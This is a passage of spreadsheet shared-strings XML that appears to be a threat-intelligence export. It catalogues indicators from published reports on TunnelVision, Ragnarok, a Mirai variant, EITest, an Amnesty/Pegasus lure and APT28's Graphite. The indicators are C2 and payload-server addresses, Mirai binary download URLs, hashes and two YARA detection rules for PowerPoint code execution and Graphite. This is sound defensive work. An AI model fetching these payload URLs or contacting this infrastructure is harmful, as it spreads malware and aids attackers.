  </si>
  <si>
    <t>hostname</t>
  </si>
  <si>
    <t>1586202421</t>
  </si>
  <si>
    <t>1586202441</t>
  </si>
  <si>
    <t>last.tax-lab.net</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>Attacks that exploit IE vulnerability (CVE-2020-0674) and Firefox vulnerability (CVE-2019-17026)</t>
  </si>
  <si>
    <t>CUDESO</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>cnnmedia.servepics.com</t>
  </si>
  <si>
    <t>Payload delivery</t>
  </si>
  <si>
    <t>sha256</t>
  </si>
  <si>
    <t>c9e7467c88d391cecc0535f0c1576c30033791a94cec676d6bbc9a37931daf20</t>
  </si>
  <si>
    <t>External analysis</t>
  </si>
  <si>
    <t>link</t>
  </si>
  <si>
    <t>https://blogs.jpcert.or.jp/ja/2020/04/ie_firefox_0day.html</t>
  </si>
  <si>
    <t>vulnerability</t>
  </si>
  <si>
    <t>1645355552</t>
  </si>
  <si>
    <t>1645355910</t>
  </si>
  <si>
    <t>CVE-2018-13379</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon</t>
  </si>
  <si>
    <t>ip-dst</t>
  </si>
  <si>
    <t>1645355741</t>
  </si>
  <si>
    <t>51.89.169.198</t>
  </si>
  <si>
    <t>Command and Control (C2) Server</t>
  </si>
  <si>
    <t>142.44.251.77</t>
  </si>
  <si>
    <t>1645355766</t>
  </si>
  <si>
    <t>182.54.217.2</t>
  </si>
  <si>
    <t>Payload Server</t>
  </si>
  <si>
    <t>1645355760</t>
  </si>
  <si>
    <t>142.44.135.86</t>
  </si>
  <si>
    <t>Tunneling Server</t>
  </si>
  <si>
    <t>51.89.190.128</t>
  </si>
  <si>
    <t>51.89.135.142</t>
  </si>
  <si>
    <t>1645355780</t>
  </si>
  <si>
    <t>51.89.178.210</t>
  </si>
  <si>
    <t>Command and Control (C2) Server,Tunneling Server</t>
  </si>
  <si>
    <t>1645355788</t>
  </si>
  <si>
    <t>www.service-management.tk</t>
  </si>
  <si>
    <t>Payload server</t>
  </si>
  <si>
    <t>www.microsoft-updateserver.cf</t>
  </si>
  <si>
    <t>1645355856</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>comment</t>
  </si>
  <si>
    <t>1645355876</t>
  </si>
  <si>
    <t>SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.</t>
  </si>
  <si>
    <t>Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it chooses to widely deploy those, we track this cluster of activity as TunnelVision.</t>
  </si>
  <si>
    <t>Much like other Iranian threat actors operating in the region lately, TunnelVision’s activities were linked to deployment of ransomware, making the group a potentially destructive actor.</t>
  </si>
  <si>
    <t>1645355898</t>
  </si>
  <si>
    <t>The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (%PROGRAMFILES%\VMware\VMware View\Server\bin\ws_TomcatService.exe)</t>
  </si>
  <si>
    <t>1621784103</t>
  </si>
  <si>
    <t>1621784419</t>
  </si>
  <si>
    <t>https://labs.yarix.com/2021/04/malware-analysis-ragnarok-ransomware/</t>
  </si>
  <si>
    <t>Malware Analysis: Ragnarok Ransomware</t>
  </si>
  <si>
    <t>Ransomware</t>
  </si>
  <si>
    <t>filename</t>
  </si>
  <si>
    <t>1621784168</t>
  </si>
  <si>
    <t>xs_high.exe</t>
  </si>
  <si>
    <t>xs_normal.exe</t>
  </si>
  <si>
    <t>xs_remote.exe</t>
  </si>
  <si>
    <t>cry_demo.dll</t>
  </si>
  <si>
    <t>packed inside the executable</t>
  </si>
  <si>
    <t>md5</t>
  </si>
  <si>
    <t>1621784202</t>
  </si>
  <si>
    <t>a0fc3c769de5cf550dffb49ff6521a81</t>
  </si>
  <si>
    <t>sha1</t>
  </si>
  <si>
    <t>3b7ca963cb2fc5abc9f09aa075e51a5782bcfde4</t>
  </si>
  <si>
    <t>360ffabf106c665ca7332f84ba158335faa487e3b47c675fd2715fc7a37db6a7</t>
  </si>
  <si>
    <t>64.32.25.202</t>
  </si>
  <si>
    <t>on port 8081</t>
  </si>
  <si>
    <t>1621784348</t>
  </si>
  <si>
    <t>https://github.com/VoidSec/RagnarokConfigDecrypt</t>
  </si>
  <si>
    <t>ConfigDecrypt</t>
  </si>
  <si>
    <t>Artifacts dropped</t>
  </si>
  <si>
    <t>!!Read_Me.html</t>
  </si>
  <si>
    <t>Ransom note</t>
  </si>
  <si>
    <t>domain</t>
  </si>
  <si>
    <t>1456957553</t>
  </si>
  <si>
    <t>sk2.touchpadz.com</t>
  </si>
  <si>
    <t>Imported via the freetext import.</t>
  </si>
  <si>
    <t>ELF Linux/Torte infection (in Wordpress) - MMD-0050-2016</t>
  </si>
  <si>
    <t>APT</t>
  </si>
  <si>
    <t>stat.touchpadz.com</t>
  </si>
  <si>
    <t>bat.touchpadz.com</t>
  </si>
  <si>
    <t>pages.touchpadz.com</t>
  </si>
  <si>
    <t>5.79.83.27</t>
  </si>
  <si>
    <t>37.139.47.183</t>
  </si>
  <si>
    <t>62.76.41.190</t>
  </si>
  <si>
    <t>62.76.186.235</t>
  </si>
  <si>
    <t>1633165080</t>
  </si>
  <si>
    <t>1633165353</t>
  </si>
  <si>
    <t>amnestyinternationalantipegasus.com</t>
  </si>
  <si>
    <t>A wolf in sheep's clothing: Actors spread malware by leveraging trust in Amnesty International and fear of Pegasus</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>1633165230</t>
  </si>
  <si>
    <t>medicalsystemworld.site</t>
  </si>
  <si>
    <t>C2</t>
  </si>
  <si>
    <t>alwaysstriveandprosper.space</t>
  </si>
  <si>
    <t>1633165286</t>
  </si>
  <si>
    <t>amnestyvspegasus.com</t>
  </si>
  <si>
    <t>Landing / distribution page</t>
  </si>
  <si>
    <t>antipegasusamnesty.com</t>
  </si>
  <si>
    <t>mementomoriforlife.ru</t>
  </si>
  <si>
    <t>1633165081</t>
  </si>
  <si>
    <t>87.249.53.124</t>
  </si>
  <si>
    <t>185.215.113.67</t>
  </si>
  <si>
    <t>194.9.71.129</t>
  </si>
  <si>
    <t>59a447749878aec9ed0a9a71332b8a3d50eafee21de446b70a370786d548ee05</t>
  </si>
  <si>
    <t>5df8a6f08f0eeb1b05f949328674444778c4c078f03e35c0efff268c58dc6396</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>1553193039</t>
  </si>
  <si>
    <t>1553193063</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/wgetbin.sh</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>New Mirai Variant Targets Enterprise Wireless Presentation &amp; Display Systems</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>epicrustserver.cf</t>
  </si>
  <si>
    <t>On port 3933</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.mips</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.mpsl</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.arm</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.arm5n</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.arm7</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.sh4</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.spc</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.x86</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.ppc</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.i686</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.m68k</t>
  </si>
  <si>
    <t>http://www.autourbe.com.co/autourbe/language/en-GB/windata/clean.x86_64</t>
  </si>
  <si>
    <t>1553193040</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.mips</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.mpsl</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.arm</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.arm5n</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.arm7</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.sh4</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.spc</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.x86</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.ppc</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.i686</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.m68k</t>
  </si>
  <si>
    <t>http://185.248.140.102/bins/clean.x86_64</t>
  </si>
  <si>
    <t>00033b5b33b59ad88aa4f196c08eb7a6d2e6ab181ec729e8ed577d55f8b1f3ee</t>
  </si>
  <si>
    <t>02975fa7929a2f98963d6431f24cf4de702eb42530ac505c47d7567cf002c3d5</t>
  </si>
  <si>
    <t>05dc7657dc240fe7f42c3ffe95526d161151dd62f8f63188fe666ed86b0347c3</t>
  </si>
  <si>
    <t>075729594c4883fda420c0749be695d6d771eb61b569ac9b0124738db0f864ef</t>
  </si>
  <si>
    <t>07f22804757914c7a16e90bdd7ee26596f04995e5f8b90ca8d746c46039bb1c8</t>
  </si>
  <si>
    <t>09d75b526c79ac98b4c07ca1f28319ac1b6cafcadd0c41b71e82252211390b3d</t>
  </si>
  <si>
    <t>0b1a51ac04a949197c4c47d589872663be05747e18e20e7f20a24b011f4db0dd</t>
  </si>
  <si>
    <t>0c42ba60d95eda9cf90f7f1dbe5bcb316d871972eff9722748e9c2a343572484</t>
  </si>
  <si>
    <t>233094f242ce7626a5a5c1fe46ee205da279e03019b8a391bcc3fa41ce77b647</t>
  </si>
  <si>
    <t>234a05ac1970af58b6f76dca22aa25bece2ef1d65f4146748f6b859a19f91d31</t>
  </si>
  <si>
    <t>2764a0a0ab9faf04478fef4fd8ec948da431885cafa6ddf0c23ef8cda379c7d9</t>
  </si>
  <si>
    <t>28de1263449d88e986e37e7ce74ebc0b6cfceaeb3d5beb5dff296354f33dbf8c</t>
  </si>
  <si>
    <t>324eb05d47b3114c48f6505db5e4cd7c81110c42488e07c547afd7869690231f</t>
  </si>
  <si>
    <t>33a8b157e2fdd1acddc5085843a5ac96ee6f9df29c8f48a483bd4eebd16f73cc</t>
  </si>
  <si>
    <t>36d72d137abc2a43a5f6c00c9a8e41f1faf5e89643e5add1529f7343a731856f</t>
  </si>
  <si>
    <t>3eccc01f6677567b0aeea89b6e50c7184698732287c29f95000acc102c02dd47</t>
  </si>
  <si>
    <t>3f299938339bc426c5d78b55a1398da31f948f7c30d6115ab30a656cdd78de35</t>
  </si>
  <si>
    <t>403e702fa7e8b0a4ebde7db2e505645507b12ef0306619fb2523dea5cdf2f40d</t>
  </si>
  <si>
    <t>4111155bfc2f0b005d763ff4cd05e60187bdc29d3b17d0971f736da779595a9a</t>
  </si>
  <si>
    <t>4495af4264d11e339c4ba9776fd79c7b5554b70bbb6cc875ed7a03b7eef15f8a</t>
  </si>
  <si>
    <t>44ae362714ba76c65150a363b0b340a5bd422649e48df37661ba1db8e0ec0f9e</t>
  </si>
  <si>
    <t>46a58cfa883c71b9066b2ffe7ce475676570e9940327782927b559ea9a47df88</t>
  </si>
  <si>
    <t>4a7bd1ab7a9505dec2d83f44b2d99f3068823db9d9d888333ccfdd239cc72192</t>
  </si>
  <si>
    <t>4ebbcfeaad77207f82d072651cae53741e6af464c61735e33e385fba8edf3f61</t>
  </si>
  <si>
    <t>4f3e5d72f53d59f932b606f440428608b5bbd4afa8ed33148e322e0096465130</t>
  </si>
  <si>
    <t>5ebfd332bc5b9697d7b07e37600d495489da1b892288f051c56c8aba9574bed7</t>
  </si>
  <si>
    <t>613e74f2d3549fe9b76eaa404b20fe87ea89672c4bf2f0d1cf88be4d657ea323</t>
  </si>
  <si>
    <t>684a4c2e426a146c2217d3e62b7f7c69ea12628d182b2441c840bddacc1597f2</t>
  </si>
  <si>
    <t>77b059f2f5b62d059fd9e3dfaf41cbeb7543ef288410f3c85a090bf03be99b24</t>
  </si>
  <si>
    <t>884929e31c2cb8dc7e51949d94fe5073216be967f83f8013e0980d8959141234</t>
  </si>
  <si>
    <t>892efa131b0cd6ca87fa0c2e3006c8352947cfc40ac0adf51a55b711a806aa80</t>
  </si>
  <si>
    <t>8c9a3f8c94210813287b2789f63410d4744f3422a8012d6b1bc60a307884732c</t>
  </si>
  <si>
    <t>8d1700c0144d6e56d8ba4e4061694c1194a7d0bc63740a1bdebf2697e46b3978</t>
  </si>
  <si>
    <t>8d28628e8a31b39e178ba8c7dd781ea19db5ec3fe20f84ba20228c47a49aa543</t>
  </si>
  <si>
    <t>8eb7eafb26235796534ba9deeada27b4e25e7c45d9b87715ee6d4182b3ca6068</t>
  </si>
  <si>
    <t>8f2e458607f85f4c22ca7135df5fa2649c9979f2bb69036b3c63de52ec2f14f0</t>
  </si>
  <si>
    <t>938e836c5035d52f954ff91fd5008a9444a3efa3e07592ceefc9efebd260b085</t>
  </si>
  <si>
    <t>95ee8502a7cbac8cb21471fc40d86ddefa87ef9790f0c06d47fe47c3a2278396</t>
  </si>
  <si>
    <t>9d37c617dacfef668548beee55a6b1d3899ffce3e7999d43159e228dcae1db01</t>
  </si>
  <si>
    <t>a4923ae6bf36a5c5507ed4e7f0c7b92524df04e132c1823e611ed584e5495186</t>
  </si>
  <si>
    <t>a61717a8c64301f20ac01f6fd7462d3303a72c9ed131fdd24cd6b12eb788377b</t>
  </si>
  <si>
    <t>a6d3081703359ee1879b2ce9c85d0c3f4ed4b319db6ecebd18054982bcf1603c</t>
  </si>
  <si>
    <t>ae7d250606c543b241b1809158a2668408c9ecaaf3ce4d51e08700f78534ce31</t>
  </si>
  <si>
    <t>b1cac267d0e3456f9da90955027e55ad1b78a7bf60f11914e959814c90ea7cc6</t>
  </si>
  <si>
    <t>b29334ca77f72587430fde00791daa1262972d315238d624e94238dda32e9240</t>
  </si>
  <si>
    <t>b34b43d240c89d1e9bbd9d99c6050afc7efa62323d7788a46801576c5b1de0ab</t>
  </si>
  <si>
    <t>b57b14f16c41a06b1f434f60cdc9bc380a4ff1ad5b7d8edc87c097cee6f3d233</t>
  </si>
  <si>
    <t>b8d284ba89b562923d1eed2e67517dc8772977decc49d5f82d75237d4a8937e6</t>
  </si>
  <si>
    <t>ba0d0e16b54aa6aaca3ab1ca2afa78148e823ae228d5f790e0279bb87dba5495</t>
  </si>
  <si>
    <t>bb5f7f92f4aa7cfdc0691037dc50549ccc705685bdd6f375c884bc68518b7e59</t>
  </si>
  <si>
    <t>bb9d7a86f107586dc8d99244a662c83c6f7667696b411292162dcb47d95d4c9b</t>
  </si>
  <si>
    <t>bc3eb0f7c8d4ecdacddac5d9ccc6ac44b6f6081f051d8890c5986faa37f56623</t>
  </si>
  <si>
    <t>bd5afefa044494010150501822f5f32be4300f482f8c8904d9fd1a30f5722fdd</t>
  </si>
  <si>
    <t>bdac2ed66c0f5633f5f12910bc9c03173be1fc51a76e495a36d700ba4ddc9da4</t>
  </si>
  <si>
    <t>c1ad4b2c0e71d2a92e4d9a4d2de01f750b8758fa3fe8a85631aaf870615b6769</t>
  </si>
  <si>
    <t>c30654f9bfd036f75a9c4a0f991f141243c821dbfc2b4d2ae308e68c4d232a57</t>
  </si>
  <si>
    <t>c86328964dfc86ca70c722e300f533bafaf234b2007867c6bf6a4e4be47cf8ca</t>
  </si>
  <si>
    <t>d049406662f083507dcd7278fa25bec0e93be06511ce290ed9ff309b514857a0</t>
  </si>
  <si>
    <t>d996a37b3bb09386b2e1e6a915b83c448065f0139d3c8057bf67e85d01ada9d1</t>
  </si>
  <si>
    <t>dc866393e6a549afd56d7a7a7411a4eff7f0cb37fe1964c4f87e4228d46c8eb2</t>
  </si>
  <si>
    <t>ddaa6c58ac7ed29166af6a337500ea5ca6ca54191a4176178e1cb1a351064c4e</t>
  </si>
  <si>
    <t>e3c250062292daaff815345e87fb9f28e7ac683338c58de7a3a9cc743f6200e6</t>
  </si>
  <si>
    <t>e5432946188a1c644e23159ae588797bd967ddc1f983956878e0ad0590efc73a</t>
  </si>
  <si>
    <t>e60451a0b5dd0b875263c8e7c74773971b0faba783957c2a305ddf5356c9d567</t>
  </si>
  <si>
    <t>e6156246bb85ca4a64377d3b68b6f34805b8a6a84890a9eada984fc29bfa36e1</t>
  </si>
  <si>
    <t>ec4eef0d92105d9b82888bce94f0a2e00988f3be1a6005c889b91afd7fd05835</t>
  </si>
  <si>
    <t>f01f85f9068f3c01193a0fb4b20a37573748914292a606da5cb2b5749b720366</t>
  </si>
  <si>
    <t>f32176c3799fd3bc3a2a24c162861d12f987db548e9ef94c3bc8c6156bcd4fe3</t>
  </si>
  <si>
    <t>f370a635db07bbd788991e898d8aa9be78ba0457cec3bd3e869ddc11e5693b5e</t>
  </si>
  <si>
    <t>f9bd8d0ae187a27d8d1ad54e8c8b551488f66141e4590ac7583cf470a2ab260d</t>
  </si>
  <si>
    <t>fab198f5f460b0591899bd218df79d2b50ec71ec2dd0494f1fa2bd07ba887aed</t>
  </si>
  <si>
    <t>fe92e66c0c5a4402972a3bf7473b98a13c067beddcba500443d194f022ca4194</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.arm</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.arm7</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.armv4l</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.i586</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.i686</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.mips</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.mipsel</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.m68k</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.x86</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.ppc</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.sh4</t>
  </si>
  <si>
    <t>http://185.248.140.102/eeppinen.sparc</t>
  </si>
  <si>
    <t>070405b85448d15afe619584c3f3cc851ed43098f57ef88981edd22b663030e7</t>
  </si>
  <si>
    <t>19e2e20d994ba7c8af6537f640ef14459b66f333a7e5b28ef733ac81b43a628b</t>
  </si>
  <si>
    <t>36562e6f3917ea80fcd241bca96fe96eb4f7328b14afd2c4b528bef9ce4b21da</t>
  </si>
  <si>
    <t>573d539b78cdbb6d199d48ea986a5ba18c293253e48e2072e9871eb5460b2ae7</t>
  </si>
  <si>
    <t>5aede6d1b0376f2e8c3c292f39357137a32c8ff1a3c60c594775081707647f59</t>
  </si>
  <si>
    <t>6efb0d2304ce4c63205c6b502ba65a7f1b7eb87b055c0c5dcbb0120f49383588</t>
  </si>
  <si>
    <t>85ac0d7ce9c899ec12c8efff89f5fcb1ed8b87623bf6a1457d53f3d1dce5c71d</t>
  </si>
  <si>
    <t>c62c5d6255b6c1b5e8fa1861122adc180b36fbf4878f175e29367c7f6b08d7c9</t>
  </si>
  <si>
    <t>db5fae3cd9ac7338e3d9fe302ffe5e261a9cafca75458523343f3562a0362ae8</t>
  </si>
  <si>
    <t>dd1ab1f58494611af68d7d4dbe548234f0429b0f0c3d42135dce8f4339a16a7b</t>
  </si>
  <si>
    <t>e0d4f82f5d1a20ca447c26b454be18aa7478a853d3526317972cb6ca9d847f29</t>
  </si>
  <si>
    <t>e14ff28d2188ff0f665468bd0e17db21f3f11292b85c2a370596481cdf7c835f</t>
  </si>
  <si>
    <t>1553193057</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/</t>
  </si>
  <si>
    <t>1463728702</t>
  </si>
  <si>
    <t>1463728767</t>
  </si>
  <si>
    <t>85.93.0.33</t>
  </si>
  <si>
    <t>Imported via the Freetext Import Tool</t>
  </si>
  <si>
    <t>EITest campaign still going strong</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>true.imwright.co.uk</t>
  </si>
  <si>
    <t>104.238.185.187</t>
  </si>
  <si>
    <t>185.117.75.219</t>
  </si>
  <si>
    <t>89.32.40.220</t>
  </si>
  <si>
    <t>aktualizacje24.com</t>
  </si>
  <si>
    <t>ubezpiecztransakcje.com</t>
  </si>
  <si>
    <t>95.183.52.215</t>
  </si>
  <si>
    <t>aktualizacje240.pl</t>
  </si>
  <si>
    <t>1463728732</t>
  </si>
  <si>
    <t>ndczaqefc.anein.top</t>
  </si>
  <si>
    <t>kmgb0.yle6to.top</t>
  </si>
  <si>
    <t>1679498032</t>
  </si>
  <si>
    <t>1679498328</t>
  </si>
  <si>
    <t>c0060c0741833af67121390922c44f91</t>
  </si>
  <si>
    <t>Payload</t>
  </si>
  <si>
    <t>In the footsteps of the Fancy Bear: PowerPoint mouse-over event abused to deliver Graphite implants</t>
  </si>
  <si>
    <t>622eb93e34445c752eeaa623ef9ac6978e58f2fc</t>
  </si>
  <si>
    <t>d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d</t>
  </si>
  <si>
    <t>ef1288de782e65d6e5bd6a327157988f</t>
  </si>
  <si>
    <t>a23efb6aa5a242c61c5d50a967a8f29da164c954</t>
  </si>
  <si>
    <t>be180a7c43734b7125b2d5cea7edd0174811a58113b048f5fe687db52db47fe3</t>
  </si>
  <si>
    <t>2ff3e6c9244ef965295aa60879d1aa6b</t>
  </si>
  <si>
    <t>4c813ad68f2f1da6b2c59d11ad983cfa65e1a187</t>
  </si>
  <si>
    <t>efa5b49bdd086125b2b7d4058d09566f1db5f183c2a6332c597322f85107667a</t>
  </si>
  <si>
    <t>9a915313d02345e149e6ba566fe85c47</t>
  </si>
  <si>
    <t>9cd7f14d85814c48be3fbf73891415978a7aa882</t>
  </si>
  <si>
    <t>34aca02d3a4665f63fddb354551b5eff5a7e8877032ddda6db4f5c42452885ad</t>
  </si>
  <si>
    <t>1679498072</t>
  </si>
  <si>
    <t>9b5uja.am.files.1drv.com</t>
  </si>
  <si>
    <t>kdmzlw.am.files.1drv.com</t>
  </si>
  <si>
    <t>https://kdmzlw.am.files.1drv.com/y4mv4glUgvW9nl8z8GU71PhPw0oRtve9QpZ0pEgwJN1q_TlGY5yl5Mvkrc5rUh0Uxxknlr1qymWyCbPrkKOFgL4CARScSn9UMhq3c5hSNOQsDOamYLmOfN61lUtQO10vxtn0I7QROJdOtQ42wDsaiACGR5ZrmYwt0SmZkphGWQpT2gOFrsUxjg8_7QT01VTABiGr3T6xpWrTmFT5yu4toQ/DSC0001.jpeg?download</t>
  </si>
  <si>
    <t>1679498109</t>
  </si>
  <si>
    <t>https:\\9b5uja.am.files.1drv.com/y4mpYJ245I931DUGr7BV-dwLD7SReTqFr1N7eQOKSH_ug2G18Jd6i3SRqYqgugj3FA2JQQ7JqclvWH13Br3B5Ux-F6QcqADr-FowC_9PZi1Aj7uckcK8Uix_7ja1tF6C_8-5xYgm6zwjbXsrlEcTEenAyA8BzEaGPudutl1wMDkzVr6Wmn8_qRmYejLgbNoQmPTUe3P5NKFFLRjeeU_JhvA/DSC0002.jpeg?download</t>
  </si>
  <si>
    <t>Payload installation</t>
  </si>
  <si>
    <t>yara</t>
  </si>
  <si>
    <t>1679498148</t>
  </si>
  <si>
    <t>rule Powerpoint_Code_Execution_87211_00007 {_x005F_x000D_
meta:_x005F_x000D_
author = "Cluster25"_x005F_x000D_
description ="Detects Code execution technique in Powerpoint (Hyperlink and Action)"_x005F_x000D_
hash1 = "d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d"_x005F_x000D_
strings:_x005F_x000D_
$magic = {D0 CF 11 E0 A1 B1 1A E1}_x005F_x000D_
$s1 = "local.lnk" fullword wide_x005F_x000D_
$s2 = "lmapi2.dll" fullword wide_x005F_x000D_
$s3 = "rundll32.exe" fullword wide_x005F_x000D_
$s4 = "InProcServer32" fullword wide_x005F_x000D_
$s5 = "DownloadData" fullword wide_x005F_x000D_
$s6 = "SyncAppvPublishingServer" fullword wide_x005F_x000D_
condition: ($magic at 0) and (all of ($s*)) and filesize &lt; 10MB _x005F_x000D_
}</t>
  </si>
  <si>
    <t>1679498162</t>
  </si>
  <si>
    <t>rule APT28_Graphite_62333_00028 : RUSSIAN THREAT GROUP {_x005F_x000D_
meta:_x005F_x000D_
description = "Detects Fancy Bear Graphite variant through internal strings"_x005F_x000D_
author = "Cluster25"_x005F_x000D_
tlp = "white"_x005F_x000D_
hash1 = "34aca02d3a4665f63fddb354551b5eff5a7e8877032ddda6db4f5c42452885ad"_x005F_x000D_
strings:_x005F_x000D_
$ = "_LL_x64.dll" fullword ascii_x005F_x000D_
$ = "qqhqx!iwwU1ptzd1WngCv9BCmVtxgFTJBPR1bJ2Ze17e0N6W3VHZC2FQOOUhu4nQ2Wrj0qLEBowQ$$" ascii_x005F_x000D_
$ = "62272a08-fe9d-4825-bc65-203842ff92bc" fullword ascii_x005F_x000D_
$ = "%s %04d sp%1d.%1d %s" fullword ascii_x005F_x000D_
condition:_x005F_x000D_
uint16(0) == 0x5a4d and_x005F_x000D_
filesize &lt; 100KB and_x005F_x000D_
all of them_x005F_x000D_
}</t>
  </si>
  <si>
    <t>1679498205</t>
  </si>
  <si>
    <t>https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/</t>
  </si>
  <si>
    <t>1679498260</t>
  </si>
  <si>
    <t>According to lure document metadata, attackers used a template potentially linked to The Organisation for Economic Co-operation and Development (OECD)</t>
  </si>
  <si>
    <t>1679498287</t>
  </si>
  <si>
    <t>This PowerPoint exploits a code execution technique that is triggered by using Hyperlinks instead of Run Program / Macro, which is designed to be triggered when the user starts the presentation mode and moves the mouse. The code that is executed is a PowerShell script</t>
  </si>
  <si>
    <t>%ALLUSERSPROFILE%\lmapi2.dll</t>
  </si>
  <si>
    <t>1679647231</t>
  </si>
  <si>
    <t>1679647951</t>
  </si>
  <si>
    <t>7aa8ae8d3f8f37e3fdefc30d161fdd4482885a7312848a7b660165c0cefb8fce</t>
  </si>
  <si>
    <t>Talos uncovers espionage campaigns targeting CIS countries, embassies and EU health care agency</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>ddeb109a97e3689b63d4ee848d4c23b0646c8070badebcc852577be0b64c7397</t>
  </si>
  <si>
    <t>5c9fbd70e73d463b0265881d904a8fca22f92b0cce24190ed16c3d8899d4120a</t>
  </si>
  <si>
    <t>e80fbef0be6a6688f9840ab6cd295f765d7f2fab8080896cfd0bf7e2c4c4c5da</t>
  </si>
  <si>
    <t>02fc87210deab1be31568fbcd80a349b9b2a9a1e19fe5ed36d9723ff1a603ca8</t>
  </si>
  <si>
    <t>d1d534028d76ea6c293d606adff4aa4ddf1d467b7329a869df5c38a0686cd15d</t>
  </si>
  <si>
    <t>176b336f425bc15651672f96f70149873b10a3badfa040c8943bfe54955e043d</t>
  </si>
  <si>
    <t>cf1f70900b4a903dc1a868a60e192791cf26cf54f22b9a742e28e60b291d81ef</t>
  </si>
  <si>
    <t>8d870328912e50f4b30e091589ac8191dfcb3b7b607156550d5468fa37b03449</t>
  </si>
  <si>
    <t>6501dd570761f2bd3eff4e3416baef57c2ff514b8dd35c9c80a37e2d489d714f</t>
  </si>
  <si>
    <t>9f8d3ee51af949ae15ca18c6fdd8e6f2d1c7970c8265bd5bb2bb2d92d358c04a</t>
  </si>
  <si>
    <t>f5664b2a20367afe8c291399ea3da0af3c1001617b6bd497d423f44b4853d273</t>
  </si>
  <si>
    <t>a6761bbbb9cc206653ccee4154c38cf5ea136345c12cf7ca9af50a320fc9e0ed</t>
  </si>
  <si>
    <t>f2a17d140efcf94800c6dc4a2454d0f8320a9e41c04145fbbeeea84ea0321d74</t>
  </si>
  <si>
    <t>1b82739880e1851d032b09de787033bd19135c8496124cd505b32afe4212b7b0</t>
  </si>
  <si>
    <t>cce5b5a282ba6637cfd840cee65739a797485e024f0259e98b35cc38cc5dca3a</t>
  </si>
  <si>
    <t>bab2776edef029cf4632663c59297bb25eced4f7dece18cfa45e88ce2ece42a0</t>
  </si>
  <si>
    <t>0aad58903f0524b82a3388b1aa6302c974dfc4ac593435f2bc0f1b9eb3ced6db</t>
  </si>
  <si>
    <t>3f6d866f09cfabb1aa2a0393d290533ed31705c87b85f77edc3fdd51b90f6e24</t>
  </si>
  <si>
    <t>aee816d2bb3b7691474ab4f90f8d344c4aa03e64093ca020048c7a0716e20694</t>
  </si>
  <si>
    <t>348f2713fba8f0543600bf38c8427eb9996769654987516e3f0202f7bcf17228</t>
  </si>
  <si>
    <t>0e0b5437592b48b358c2a4174308c7793213701704e4695bb42e03dbb4284f05</t>
  </si>
  <si>
    <t>1f591a5c726b279174ce06f3fa9e5db0019b12c9b5b8e19a529bf6cb1153f164</t>
  </si>
  <si>
    <t>21c2ff30adb655bad806a9107afdb7954d02356d5f4cb709a55fd65fbf84361f</t>
  </si>
  <si>
